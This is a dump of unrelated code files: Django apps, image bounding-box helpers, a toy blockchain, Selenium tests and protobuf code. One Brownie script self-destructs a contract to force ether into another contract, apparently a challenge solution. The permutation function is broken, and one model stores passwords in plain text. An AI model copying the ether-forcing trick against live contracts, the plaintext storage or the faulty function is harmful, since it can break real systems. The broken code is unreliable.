'V87RF':(651145, 651464),
'V88RF':(657297, 657595),
'V89RF':(673127, 673425),
'V90RF':(683762, 684057),
'V91RF':(694693, 694991),
'V92RF':(699762, 700057),
'V93RF':(705812, 706101),
'V94RF':(731650, 731945),
'V95RF':(739090, 739376),
'V96RF':(751476, 751771),
'V97RF':(763016, 763314),
'V98RF':(770505, 770800),
'V99RF':(781231, 781529),
'V100RF':(788053, 788348),
'V101RF':(795357, 795652),
'V102RF':(806396, 806694),
'V103RF':(811997, 812295),
'V104RF':(815265, 815563),
'V105RF':(830607, 830905),
'V106RF':(837593, 837891),
'V107RF':(843247, 843542),
'V108RF':(849125, 849423),
'V109RF':(863753, 864048),
'V110RF':(866974, 867269),
'V111RF':(874917, 875221),
'V112RF':(885259, 885554),
'V113RF':(894236, 894534),
'V114RF':(906239, 906537),
'V115RF':(914069, 914364),
'V116RF':(954968, 955263),
'V117RF':(960301, 960596),
'V118RF':(974118, 974419),
'V199RF':(213152, 213444)
}
#Chr7
RF_trav= {
'V119RF':(376249, 376532),
'V120RF':(401348, 401649),
'V121RF':(488320, 488615),
'V122RF':(500476, 500762),
'V123RF':(519212, 519501),
'V124RF':(529172, 529458),
'V125RF':(565497, 565789),
'V126RF':(578732, 579024),
'V127RF':(591554, 591843),
'V128RF':(596993, 597288),
'V129RF':(617954, 618243),
'V130RF':(640532, 640818),
'V131RF':(652596, 652891),
'V132RF':(666452, 666744),
'V133RF':(672397, 672698),
'V134RF':(690719, 691011),
'V135RF':(728127, 728425),
'V136RF':(739934, 740217),
'V137RF':(749403, 749689),
'V138RF':(761626, 761915),
'V139RF':(764845, 765146),
'V140RF':(800534, 800820),
'V141RF':(810884, 811176),
'V142RF':(839335, 839630),
'V143RF':(872392, 872681),
'V144RF':(880635, 880933),
'V145RF':(891540, 891829),
'V147RF':(955188, 955477),
'V148RF':(959650, 959939),
'V149RF':(967088, 967386),
'V150RF':(978092, 978390),
'V151RF':(987208, 987503),
'V152RF':(1004598, 1004881),
'V153RF':(1018152, 1018459),
'V154RF':(1023919, 1024205),
'V155RF':(1047022, 1047311),
'V156RF':(1051889, 1052175),
'V157RF':(1064813, 1065099),
'V158RF':(1069500, 1069789),
'V159RF':(1107467, 1107768),
'V160RF':(1116975, 1117273),
'V161RF':(1140579, 1140865),
'V162RF':(1151526, 1151815),
'V163RF':(1157941, 1158242),
'V195RF':(1498, 1793), #scaffold1099214732309
'V201RF':(2885, 3195) #scaffold1099214128018
}
# Chromosome start offsets, presumably for converting the local
# coordinates above to genome positions — confirm against downstream use.
start_chr10=65303593
start_chr13=88936957
# NOTE(review): start_chr13 is assigned twice — the line below silently
# overwrites the value above (88936957 -> 112709235). One of the two is
# presumably a misnamed constant (the kappa tables span two coordinate
# clusters); confirm which value downstream code expects.
start_chr13=112709235
start_chr7=83967455
start_chr3=179305555
|
991,656 | 1049df00d76d7bd45efbfc8f1f66b897caadb18b | from django import forms
class per_day_form(forms.Form):
#sets different field for per_day_form
amount = forms.IntegerField(max_value=200, min_value=0)
due_date_month = forms.ChoiceField(choices=[(x, x) for x in range(1, 13)], label='Due Date')
due_date_day = forms.ChoiceField(choices=[(x, x) for x in range(1, 32)], label='/ ', label_suffix="")
due_date_year = forms.ChoiceField(choices=[(x, x) for x in range(2018, 2051)], label='/ ', label_suffix="")
# gets clean data from field user inputs
def clean(self):
cleaned_data = super(per_day_form, self).clean()
amount = cleaned_data.get('amount')
due_date_month = cleaned_data.get('due_date_month')
due_date_day = cleaned_data.get('due_date_day')
due_date_year = cleaned_data.get('due_date_year')
# raise error if user did not fill in one or more fields
if not due_date_month and not due_date_day and not due_date_year and not amount:
raise forms.ValidationError('Please enter all fields')
class grade_recieved_form(forms.Form):
    """Form collecting a grade percentage and the points possible.

    (Class name typo "recieved" kept: it is the public interface.)
    """
    grade = forms.IntegerField(label='Percent', max_value=100, min_value=0)
    points_possible = forms.IntegerField(label='Points Possible', max_value=200, min_value=0)

    def clean(self):
        """Cross-field validation: both fields must be supplied.

        Bug fix: the original used ``and`` (error only when both were
        missing) and ``not grade`` would reject a legitimate grade of 0
        (min_value=0); compare against None instead.
        """
        cleaned_data = super(grade_recieved_form, self).clean()
        grade = cleaned_data.get('grade')
        points_possible = cleaned_data.get('points_possible')
        # Raise if ANY field is missing.
        if grade is None or points_possible is None:
            raise forms.ValidationError('Please enter all fields')
        # Django convention: clean() returns the cleaned data dict.
        return cleaned_data
|
991,657 | ab8938a13104cc34194bd50fb5ff1ec012ee2f79 | import numpy as np
from PIL import Image, ImageOps, ImageDraw
__all__ = ['convert_bboxes_to_float',
'convert_bboxes_to_int',
'bboxes_filter_center',
'crop_bboxes',
'resize_bboxes',
'pad_image',
'crop_image',
'draw_boxes',
'intersection',
'iou']
def convert_bboxes_to_float(bboxes, image_shape):
    '''Normalize pixel-coordinate boxes to the [0, 1] range.

    :param bboxes: int-type boxes [..., [ymin, xmin, ymax, xmax]]
    :param image_shape: (height, width)
    :return: float boxes of the same shape
    '''
    height, width = image_shape[0], image_shape[1]
    scaled = [bboxes[..., 0] / height,
              bboxes[..., 1] / width,
              bboxes[..., 2] / height,
              bboxes[..., 3] / width]
    return np.stack(scaled, axis=-1)
def convert_bboxes_to_int(bboxes, image_shape):
    '''Inverse of convert_bboxes_to_float: scale normalized boxes back
    to pixel coordinates.

    :param bboxes: float boxes [..., [ymin, xmin, ymax, xmax]] in [0, 1]
    :param image_shape: (height, width)
    :return: pixel-coordinate boxes of the same shape
    '''
    height, width = image_shape[0], image_shape[1]
    return np.stack([bboxes[..., 0] * height,
                     bboxes[..., 1] * width,
                     bboxes[..., 2] * height,
                     bboxes[..., 3] * width], axis=-1)
def bboxes_filter_center(bboxes, image_shape):
    """Build a mask keeping only boxes whose center lies inside the image.

    :param bboxes: pixel-coordinate boxes [..., [ymin, xmin, ymax, xmax]]
    :param image_shape: (height, width)
    :return: boolean numpy mask, True where the box center is in-bounds
    """
    center_y = (bboxes[..., 0] + bboxes[..., 2]) / 2.
    center_x = (bboxes[..., 1] + bboxes[..., 3]) / 2.
    # All four bounds must hold simultaneously.
    return np.logical_and.reduce([
        center_y > 0,
        center_x > 0,
        center_y < image_shape[0],
        center_x < image_shape[1],
    ])
def crop_bboxes(bbox_ref, bboxes):
    """Shift boxes into the coordinate frame of a reference box.

    Useful for updating boxes after an image crop: the reference box's
    top-left corner becomes the new origin.

    :param bbox_ref: pixel-coordinate reference box [ymin, xmin, ymax, xmax]
    :param bboxes: pixel-coordinate boxes to translate
    :return: translated boxes
    """
    origin_offset = np.stack([bbox_ref[0], bbox_ref[1], bbox_ref[0], bbox_ref[1]])
    return bboxes - origin_offset
def resize_bboxes(ratios, bboxes):
    """Rescale boxes after the image was resized.

    :param ratios: (ratio_h, ratio_w) -- new_size / old_size per axis
    :param bboxes: pixel-coordinate boxes [..., [ymin, xmin, ymax, xmax]]
    :return: rescaled boxes
    """
    ratio_h, ratio_w = ratios[0], ratios[1]
    return np.stack([bboxes[..., 0] * ratio_h,
                     bboxes[..., 1] * ratio_w,
                     bboxes[..., 2] * ratio_h,
                     bboxes[..., 3] * ratio_w], axis=-1)
def pad_image(img, boxes, pad_shape):
    '''
    Pad the image (centred) up to pad_shape; a side already >= pad_shape
    is left untouched.

    Bug fixes vs the original:
      * PIL Images expose ``size`` (width, height), not ``shape`` -- the
        original raised AttributeError.
      * ``ImageOps.expand`` interprets a 4-tuple border as
        (left, top, right, bottom); the original passed the height deltas
        in the left/right slots.
      * All four box coordinates must be shifted (ymin/ymax by the top
        pad, xmin/xmax by the left pad); the original shifted only the
        first two entries.

    :param img: Pillow Image
    :param boxes: boxes [..., [ymin, xmin, ymax, xmax]]
                  (assumes a numpy array, consistent with the other
                  helpers in this module -- TODO confirm callers)
    :param pad_shape: (height, width)
    :return: (padded_img, padded_boxes)
    '''
    img_w, img_h = img.size
    if img_h < pad_shape[0] or img_w < pad_shape[1]:
        delta_h = max(0, pad_shape[0] - img_h)
        delta_w = max(0, pad_shape[1] - img_w)
        top = delta_h // 2
        left = delta_w // 2
        # PIL border order: (left, top, right, bottom).
        border = (left, top, delta_w - left, delta_h - top)
        padded_img = ImageOps.expand(img, border)
        boxes[..., 0] += top
        boxes[..., 2] += top
        boxes[..., 1] += left
        boxes[..., 3] += left
        return padded_img, boxes
    else:
        return img, boxes
def crop_image(img, crop_box, boxes):
    '''Crop the image to crop_box and translate boxes into the crop frame.

    :param img: Pillow Image
    :param crop_box: pixel-coordinate box [ymin, xmin, ymax, xmax]
    :param boxes: pixel-coordinate boxes
    :return: (cropped_img, cropped_boxes)
    '''
    ymin, xmin, ymax, xmax = crop_box[0], crop_box[1], crop_box[2], crop_box[3]
    # PIL's crop() expects (left, upper, right, lower).
    region = img.crop([xmin, ymin, xmax, ymax])
    return region, crop_bboxes(crop_box, boxes)
def draw_boxes(img, boxes, color='green', width=3):
    '''
    Draw rectangles on the image.

    :param img: Pillow Image or RGB numpy array
    :param boxes: boxes [[ymin, xmin, ymax, xmax], ...] (the code reads
                  box[0]=ymin, box[1]=xmin, box[2]=ymax, box[3]=xmax)
    :param color: outline color
    :param width: outline width in pixels
    :return: Image with the boxes drawn
    '''
    if isinstance(img, np.ndarray):
        canvas = Image.fromarray(img.astype(np.uint8), mode='RGB')
    elif isinstance(img, Image.Image):
        canvas = img
    else:
        raise ValueError("image must be a Image or ndarray.")
    pen = ImageDraw.Draw(canvas)
    for box in boxes:
        # PIL rectangle order: (left, upper, right, lower) = (xmin, ymin, xmax, ymax).
        pen.rectangle([box[1], box[0], box[3], box[2]], outline=color, width=width)
    return canvas
def intersection(boxes1, boxes2):
    """Pairwise intersection areas between two box sets.

    :param boxes1: numpy.ndarray [num1, 4], columns ymin, xmin, ymax, xmax
    :param boxes2: numpy.ndarray [num2, 4], same layout
    :return: numpy.ndarray [num1, num2] of intersection areas
    """
    assert(boxes1.shape[1] == 4 and boxes2.shape[1] == 4)
    ymin1, xmin1, ymax1, xmax1 = np.split(boxes1, 4, axis=1)
    ymin2, xmin2, ymax2, xmax2 = np.split(boxes2, 4, axis=1)
    # Broadcast [num1, 1] against [num2] to get an all-pairs grid;
    # clamp negative extents (disjoint boxes) to zero.
    overlap_h = np.maximum(
        0.0, np.minimum(ymax1, ymax2.reshape(-1)) - np.maximum(ymin1, ymin2.reshape(-1)))
    overlap_w = np.maximum(
        0.0, np.minimum(xmax1, xmax2.reshape(-1)) - np.maximum(xmin1, xmin2.reshape(-1)))
    return overlap_h * overlap_w
def iou(boxes1, boxes2):
    """Pairwise intersection-over-union between two box sets.

    :param boxes1: numpy.ndarray [num1, 4], columns ymin, xmin, ymax, xmax
    :param boxes2: numpy.ndarray [num2, 4], same layout
    :return: numpy.ndarray [num1, num2] of IoU values
    """
    inter = intersection(boxes1, boxes2)
    area1 = (boxes1[:, 2] - boxes1[:, 0]) * (boxes1[:, 3] - boxes1[:, 1])
    area2 = (boxes2[:, 2] - boxes2[:, 0]) * (boxes2[:, 3] - boxes2[:, 1])
    # Union = A + B - A∩B, broadcast to the [num1, num2] grid.
    union = area1[:, None] + area2[None, :] - inter
    return inter / union
|
991,658 | 3bf21cb27874d498085048fbf33b3d3125522ecd | from math import pi
# Material and geometry of the column (Euler buckling example).
E = 10e9 # Pa  -- Young's modulus (10 GPa)
I = 1.25e-5 # m**4  -- second moment of area
L = 3 # m  -- column length
def column_eigenvalue(n):
    """Return the n-th buckling eigenvalue n*pi/L (units 1/m), n = 1, 2, 3, ..."""
    return (pi * n) / L
def buckling_load(n):
    """Return the n-th critical (Euler) buckling load in N, n = 1, 2, 3, ..."""
    numerator = n**2 * pi**2 * E * I
    return numerator / L**2
# Print mode number, eigenvalue (1/m) and buckling load (kN) for modes 1-8.
for n in range(1,9):
    print("%d %11.4f %11.3f" % (n, column_eigenvalue(n), buckling_load(n)/1e3))
|
991,659 | 63c9b8e09abe223dba258cc0e6e4c6a48af100ac | from django.shortcuts import render
import datetime
import hashlib
import json
from django.http import JsonResponse
class Blockchain:
    """A minimal proof-of-work blockchain (no transactions; demo only)."""

    def __init__(self):
        # Every chain starts with a genesis block (nonce 1, previous hash '0').
        self.chain = []
        self.create_block(nonce=1, previous_hash='0')

    def create_block(self, nonce, previous_hash):
        """Append a new block to the chain and return it."""
        block = {
            'index': len(self.chain) + 1,
            'timestamp': str(datetime.datetime.now()),
            'nonce': nonce,
            'previous_hash': previous_hash,
        }
        self.chain.append(block)
        return block

    def get_previous_block(self):
        """Return the most recently appended block."""
        return self.chain[-1]

    def proof_of_work(self, previous_nonce):
        """Find the smallest nonce whose sha256(nonce^2 - previous_nonce^2)
        hex digest starts with four zeros."""
        candidate = 1
        while True:
            digest = hashlib.sha256(
                str(candidate**2 - previous_nonce**2).encode()).hexdigest()
            if digest[:4] == '0000':
                return candidate
            candidate += 1

    def hash(self, block):
        """Return the sha256 hex digest of the block's canonical JSON form."""
        encoded_block = json.dumps(block, sort_keys=True).encode()
        return hashlib.sha256(encoded_block).hexdigest()

    def is_chain_valid(self, chain):
        """Verify hash links and proof-of-work for every non-genesis block."""
        for position in range(1, len(chain)):
            current = chain[position]
            previous = chain[position - 1]
            # Link check: stored previous_hash must match the real hash.
            if current['previous_hash'] != self.hash(previous):
                return False
            # Work check: the nonce pair must satisfy the PoW condition.
            work = hashlib.sha256(
                str(current['nonce']**2 - previous['nonce']**2).encode()).hexdigest()
            if work[:4] != '0000':
                return False
        return True
# Create the module-level blockchain instance.
# NOTE(review): this rebinds the name `Blockchain` to an *instance*, shadowing
# the class -- no further instances can be created after this line. A
# lowercase name (e.g. `blockchain`) would be clearer; kept as-is because
# callers elsewhere may rely on this name.
Blockchain = Blockchain()
|
991,660 | 7a8b784a807bc977d3ca2876d7d98ec3fae37c66 | """gamershub URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf import settings
from django.conf.urls import include, url
from django.contrib import admin
from django.views.static import serve
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
from paypal.standard.ipn import urls as paypal_urls
from gamershub_store import views as gamershub_paypal_views
from gamershub_products import views as gamershub_product_views
from home import views as home_views
from settings.dev import MEDIA_ROOT, STATIC_ROOT
# Project URL routing table.
urlpatterns = [
    # add the url to access the admin panel
    # NOTE(review): newer Django expects `admin.site.urls` directly (without
    # include()), and `url(..., include(...), name=...)` ignores the name --
    # confirm against the Django version in use.
    url(r'^admin/', include(admin.site.urls), name='admin'),
    # accounts app urls
    url(r'^accounts/', include('accounts.urls')),
    # home app urls
    url(r'^$', home_views.get_index, name='home'),
    # here we want to add the urls from gamersblog app
    url(r'^blog/', include('gamersblog.urls')),
    # gamershub store urls (obscured prefix for the PayPal IPN endpoint)
    url(r'^AqJP9tJZrcgZgWAdj92qKmHK3/', include(paypal_urls)),
    url(r'^paypal-return', gamershub_paypal_views.paypal_return),
    url(r'^paypal-cancel', gamershub_paypal_views.paypal_cancel),
    # gamershub products urls
    url(r'^products/$', gamershub_product_views.products_list, name='products'),
    # Media Root urls
    # NOTE(review): serving media/static via django.views.static.serve is
    # intended for development only -- use a web server in production.
    url(r'^media/(?P<path>.*)$', serve, {'document_root': MEDIA_ROOT}),
    # Static Root urls
    url(r'^static/(?P<path>.*)$', serve, {'document_root': STATIC_ROOT,}),
]
# debug settings to use for static files
if settings.DEBUG:
    urlpatterns += staticfiles_urlpatterns()
|
991,661 | e37854f3f063424968bf1671501101272df954e0 | # Done by Carlos Amaral (2021/01/02)
import random
def guess(x):
    """Interactive number-guessing game between 1 and x.

    The sentinel value 12 quits the game.

    Bug fix: the original checked the quit sentinel before the win
    condition, so when the secret number itself was 12 (possible for
    x >= 12) a correct guess of 12 quit instead of winning. The win
    check now runs first. The local variable is also renamed so it no
    longer shadows the function name.
    """
    random_number = random.randint(1, x)
    while True:
        print('Press 12 to quit at any time')
        attempt = int(input(f'Please, guess a number between 1 and {x}: '))
        if attempt == random_number:
            print(f'Correct, the random_number is {random_number}!! Congratulations :)')
            break
        if attempt == 12:
            # Quit sentinel (checked only after the win condition).
            break
        if attempt < random_number:
            print('Too low!')
        else:
            print('Too high!')
guess(10)
|
991,662 | e7016e0c3f8320b590f2c112b034508c8044f4fb | #!/usr/bin/python3
"""
script that lists all states from the database hbtn_0e_0_usa
"""
import MySQLdb
import sys
if __name__ == '__main__':
    # Connect with CLI credentials: argv[1]=user, argv[2]=password, argv[3]=db.
    miConexion = MySQLdb.connect(host='localhost', user=sys.argv[1],
                                 passwd=sys.argv[2], db=sys.argv[3])
    cur = miConexion.cursor()
    cur.execute("SELECT * FROM states ORDER BY states.id ASC")
    # NOTE(review): each row is unpacked as (name, id), but a typical states
    # table returns (id, name) for SELECT * -- the variable names look
    # swapped (output is unaffected since the whole tuple is printed).
    # `id` also shadows the builtin. Verify against the table schema.
    for name, id in cur.fetchall():
        print((name, (id)))
    cur.close()
    miConexion.close()
|
991,663 | 7ff44d3e91b665f636aec6ff96bd0d236340d20a | from django.db import models
import re
from django.utils.timezone import now
# Create your models here.
class UserManager(models.Manager):
    """Manager providing registration-form validation for User."""

    def basic_validation(self, postData):
        """Validate name/email/password values from POST data.

        Returns a dict mapping field keys to error messages (empty when valid).
        """
        errors = {}
        email_pattern = re.compile(
            r'^[a-zA-Z0-9.+_-]+@[a-zA-Z0-9._-]+\.[a-zA-Z]+$')
        if len(postData['name']) < 2:
            errors['name'] = 'Name should be at least 2 characters'
        if not email_pattern.match(postData['email']):
            errors['email'] = "Invalid email address!"
        if len(postData['password']) < 8:
            errors['password'] = 'Password should be at least 8 characters'
        if postData['password'] != postData['confirm_pw']:
            errors['pw'] = 'Password and Confirm Password do not match'
        return errors
class ExpenseManager(models.Manager):
    """Manager providing form validation for Expense."""

    def basic_validation(self, postData):
        """Require category, amount and expense_date; return an errors dict."""
        errors = {}
        # Message text kept verbatim (including the 'an date' wording) to
        # preserve user-visible behavior.
        required = (
            ('category', 'Please enter a category'),
            ('amount', 'Please enter an amount'),
            ('expense_date', 'Please enter an date'),
        )
        for field, message in required:
            if len(postData[field]) == 0:
                errors[field] = message
        return errors
class IncomeManager(models.Manager):
    """Manager providing form validation for Income."""

    def basic_validation(self, postData):
        """Require category, amount and income_date; return an errors dict."""
        errors = {}
        # Message text kept verbatim (including the 'an date' wording) to
        # preserve user-visible behavior.
        required = (
            ('category', 'Please enter a category'),
            ('amount', 'Please enter an amount'),
            ('income_date', 'Please enter an date'),
        )
        for field, message in required:
            if len(postData[field]) == 0:
                errors[field] = message
        return errors
class CategoryManager(models.Manager):
    """Manager providing form validation for the category models."""

    def basic_validation(self, postData):
        """Require a non-empty category_name; return an errors dict."""
        errors = {}
        if not len(postData['category_name']):
            errors['category_name'] = 'Please enter a category name'
        return errors
class User(models.Model):
    """Application user (custom model, not django.contrib.auth).

    NOTE(review): password is a plain CharField -- nothing here shows it
    being hashed; ensure the view layer hashes (e.g. bcrypt) before save.
    """
    name = models.CharField(max_length=255)
    email = models.CharField(max_length=255)
    password = models.CharField(max_length=255)
    created_at = models.DateTimeField(auto_now_add=True)
    updated_at = models.DateTimeField(auto_now=True)
    objects = UserManager()
class Expense(models.Model):
    """A single expense entry belonging to a User.

    NOTE(review): FloatField for money is lossy -- DecimalField is the
    usual choice; kept as-is (changing it requires a migration).
    """
    amount = models.FloatField()
    # Defaults to "now" at creation time (timezone handling per settings).
    date = models.DateField(default=now)
    description = models.TextField()
    owner = models.ForeignKey(
        User, related_name="expense_by_user", on_delete=models.CASCADE)
    category = models.CharField(max_length=255)
    created_at = models.DateTimeField(auto_now_add=True)
    updated_at = models.DateTimeField(auto_now=True)
    objects = ExpenseManager()
    def __str__(self):
        return self.category
    class Meta:
        # Newest entries first by default.
        ordering = ['-date']
class Income(models.Model):
    """A single income entry belonging to a User (mirror of Expense)."""
    amount = models.FloatField()
    # Defaults to "now" at creation time (timezone handling per settings).
    date = models.DateField(default=now)
    description = models.TextField()
    owner = models.ForeignKey(
        User, related_name="income_by_user", on_delete=models.CASCADE)
    category = models.CharField(max_length=255)
    created_at = models.DateTimeField(auto_now_add=True)
    updated_at = models.DateTimeField(auto_now=True)
    objects = IncomeManager()
    def __str__(self):
        return self.category
    class Meta:
        # Newest entries first by default.
        ordering = ['-date']
class ExpenseCategory(models.Model):
    """A user-defined category for expenses.

    NOTE(review): both ExpenseCategory and IncomeCategory use the plural
    'Categories', which is ambiguous in the admin listing.
    """
    name = models.CharField(max_length=255)
    owner = models.ForeignKey(
        User, related_name="expense_category_by_user", on_delete=models.CASCADE)
    objects = CategoryManager()
    created_at = models.DateTimeField(auto_now_add=True)
    updated_at = models.DateTimeField(auto_now=True)
    class Meta:
        verbose_name_plural = 'Categories'
    def __str__(self):
        return self.name
class IncomeCategory(models.Model):
    """A user-defined category for income entries (mirror of ExpenseCategory)."""
    name = models.CharField(max_length=255)
    owner = models.ForeignKey(
        User, related_name="income_category_by_user", on_delete=models.CASCADE)
    objects = CategoryManager()
    created_at = models.DateTimeField(auto_now_add=True)
    updated_at = models.DateTimeField(auto_now=True)
    class Meta:
        verbose_name_plural = 'Categories'
    def __str__(self):
        return self.name
|
991,664 | f8bf4a10fee73e7dadd79b324bf870569561158a | def f(s):
if s == "":
return [""]
result = []
for p in f(s[1:]):
for i in range(len(p) + 1):
# p_i = s[0] + p[i:]
# p_i = p[:i-1] + s[i] + p[i+1:]
# p_i = p[:i] + s[0] + p[i:]
p_i = p[:i] + s[0]
result.append(p_i)
return result
if __name__ == '__main__':
    # 5 characters -> 5! = 120 generated strings.
    print (len(f('abcde')))
991,665 | 7591cf50848822ad59098d06da02d2cd7a6a2bcd | a, b = map(int, input().split())
ans = "Yay!" if a <= 8 and b <= 8 else ":("
print(ans)
|
991,666 | acbebf2546d62ad55423bef0845a6223e1bd7ea8 | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: playback.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
import librespot.protobuffers.context_track_pb2 as context__track__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='playback.proto',
package='spotify.player.proto.transfer',
syntax='proto2',
serialized_options=b'\n\024com.spotify.transferH\002',
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n\x0eplayback.proto\x12\x1dspotify.player.proto.transfer\x1a\x13\x63ontext_track.proto\"\xa5\x01\n\x08Playback\x12\x11\n\ttimestamp\x18\x01 \x01(\x03\x12 \n\x18position_as_of_timestamp\x18\x02 \x01(\x05\x12\x16\n\x0eplayback_speed\x18\x03 \x01(\x01\x12\x11\n\tis_paused\x18\x04 \x01(\x08\x12\x39\n\rcurrent_track\x18\x05 \x01(\x0b\x32\".spotify.player.proto.ContextTrackB\x18\n\x14\x63om.spotify.transferH\x02'
,
dependencies=[context__track__pb2.DESCRIPTOR,])
_PLAYBACK = _descriptor.Descriptor(
name='Playback',
full_name='spotify.player.proto.transfer.Playback',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='timestamp', full_name='spotify.player.proto.transfer.Playback.timestamp', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='position_as_of_timestamp', full_name='spotify.player.proto.transfer.Playback.position_as_of_timestamp', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='playback_speed', full_name='spotify.player.proto.transfer.Playback.playback_speed', index=2,
number=3, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='is_paused', full_name='spotify.player.proto.transfer.Playback.is_paused', index=3,
number=4, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='current_track', full_name='spotify.player.proto.transfer.Playback.current_track', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=71,
serialized_end=236,
)
_PLAYBACK.fields_by_name['current_track'].message_type = context__track__pb2._CONTEXTTRACK
DESCRIPTOR.message_types_by_name['Playback'] = _PLAYBACK
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Playback = _reflection.GeneratedProtocolMessageType('Playback', (_message.Message,), {
'DESCRIPTOR' : _PLAYBACK,
'__module__' : 'playback_pb2'
# @@protoc_insertion_point(class_scope:spotify.player.proto.transfer.Playback)
})
_sym_db.RegisterMessage(Playback)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
|
991,667 | 9c4e7499b77346b6248df0779c79fe38e8863dd9 | from brownie import accounts, ForceTransfer, chain, web3
import brownie
import pytest
def main():
    """Deploy ForceTransfer aimed at a hard-coded contract address, fund the
    deployed contract with 1 wei, then self-destruct it (brownie script)."""
    # Target that will receive the forced ether transfer.
    address_empty_contract = '0xEC60d52feBcB327d7a3887920Abe8175986715e7'
    # Load the locally stored deployment account (prompts for its password).
    caller = accounts.load('accountDeploy01')
    force_transfer = caller.deploy(
        ForceTransfer,
        address_empty_contract,
        publish_source=True
    )
    # this call not run on rinkeby server -- dont know why, it get stuck for an hour.
    web3.eth.sendTransaction(
        {"from": caller.address, "to": force_transfer.address, "value": 1})
    # selfdestruct pushes the contract balance to the target address.
    force_transfer.selfDestruct({"from": caller.address})
|
991,668 | 596a2a3834dc9983f71e436e150caf898d266768 |
import Image
import ImageDraw
import ImageFont
def draw_object(position, sequence):
    """Draw a staggered grid of labelled circles at the given (x, y) offset.

    20 rows alternate between 4 and 3 circles; odd rows shift right by half
    a cell. Labels are consumed from `sequence` in order. Relies on the
    module-level globals `draw`, `sans16`, SIZE, TRANSX and TRANSY.
    """
    label_index = 0
    for row in range(20):
        shift = SIZE / 2 if row % 2 == 1 else 0
        for col in range(4 - row % 2):
            x0 = SIZE * col + shift + position[0]
            y0 = SIZE * row + position[1]
            # Circle outline in black, no fill.
            draw.ellipse((x0, y0, x0 + SIZE, y0 + SIZE), None, (0,0,0))
            draw.text((x0 + TRANSX, y0 + TRANSY), sequence[label_index], (0,0,0), sans16)
            label_index = label_index + 1
#-----------------------------------
fontPath = "/usr/share/fonts/truetype/liberation/LiberationSerif-Regular.ttf"
sans16 = ImageFont.truetype ( fontPath, 16 )
im = Image.new('RGB', (600,600), (255, 255, 255))
draw = ImageDraw.Draw(im)
SIZE = 20
TRANSX = 5
TRANSY = 1
sequence = "ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ"
draw_object((0,0), sequence)
draw_object((120,20), sequence)
draw_object((240,10), sequence)
draw_object((360,30), sequence)
draw_object((480,0), sequence)
im.show()
im.save('test.png', 'PNG')
|
991,669 | 0c5c18e3e92843f729103d880bbf967ebab5ee4d | '''
Agenda:
1.)Print how many links present in a page
2.)Print all link in console using loop(Extract all link)
3.)Clicking on the link
'''
from selenium import webdriver
from selenium.webdriver.common.by import By
# NOTE(review): `executable_path` is deprecated in Selenium 4 -- prefer
# passing a Service object; confirm the Selenium version in use.
driver=webdriver.Chrome(executable_path='C:\\Users\\Dell\\PycharmProjects\\selenium\\drivers\\chromedriver.exe')
# driver=webdriver.Firefox(executable_path='C:\\Users\\Dell\\PycharmProjects\\selenium\\drivers\\geckodriver.exe')
# driver=webdriver.Ie(executable_path='C:\\Users\\Dell\\PycharmProjects\\selenium\\drivers\\IEDriverServer.exe')
# driver.get('https://fs2.formsite.com/meherpavan/form2/index.html')
# Each get() replaces the previous page; only the last URL is exercised.
driver.get('http://newtours.demoaut.com/')
driver.get('https://www.girmiti.com/')
# Collect every anchor element on the final page.
links=driver.find_elements(By.TAG_NAME,'a')
# print("No. of links present:",len(links))
# for link in links:
# print(link.text)
#Clicking on the link
# driver.find_element(By.LINK_TEXT,'REGISTER').click()
driver.find_element(By.PARTIAL_LINK_TEXT,'R').click()
991,670 | 5a75f674fa7972ff3cadc7731a2f45db8fbb2227 | from typing import *
# Definition for singly-linked list.
class ListNode:
    """A node in a singly linked list: a payload and a successor pointer."""

    def __init__(self, x):
        # next is None until the node is linked into a list.
        self.val, self.next = x, None
class Solution:
    def detectCycle(self, head: ListNode) -> ListNode:
        """Return the node where a cycle begins, or None if the list is acyclic.

